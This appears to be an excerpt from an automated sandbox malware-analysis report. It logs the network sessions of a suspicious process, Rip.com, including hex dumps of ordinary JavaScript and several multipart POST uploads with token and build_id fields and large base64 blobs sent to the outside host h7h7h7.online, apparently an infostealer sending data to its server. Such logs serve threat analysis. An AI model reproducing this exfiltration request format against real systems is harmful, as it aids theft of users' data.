                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c
                                                                                                                                                                                                                                                              Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45
                                                                                                                                                                                                                                                              Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                              Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e
                                                                                                                                                                                                                                                              Data Ascii: ction(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.n
                                                                                                                                                                                                                                                              2024-12-31 20:40:22 UTC1390INData Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53
                                                                                                                                                                                                                                                              Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("S


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              12192.168.2.449764116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:23 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----3o8y5pp8q9rqim7y5pzm
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 505
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:23 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 33 6f 38 79 35 70 70 38 71 39 72 71 69 6d 37 79 35 70 7a 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 33 6f 38 79 35 70 70 38 71 39 72 71 69 6d 37 79 35 70 7a 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 33 6f 38 79 35 70 70 38 71 39 72 71 69 6d 37 79 35 70 7a 6d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------3o8y5pp8q9rqim7y5pzmContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------3o8y5pp8q9rqim7y5pzmContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------3o8y5pp8q9rqim7y5pzmCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:24 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              13192.168.2.449768116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC281OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----nozukfct00zuaaa1vkfu
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 213453
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 6f 7a 75 6b 66 63 74 30 30 7a 75 61 61 61 31 76 6b 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 6e 6f 7a 75 6b 66 63 74 30 30 7a 75 61 61 61 31 76 6b 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6e 6f 7a 75 6b 66 63 74 30 30 7a 75 61 61 61 31 76 6b 66 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------nozukfct00zuaaa1vkfuContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------nozukfct00zuaaa1vkfuContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------nozukfct00zuaaa1vkfuCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                              Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                              2024-12-31 20:40:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:26 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              14192.168.2.449769116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:26 UTC280OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----8gdtrqimyusrimgdba1d
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 55081
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
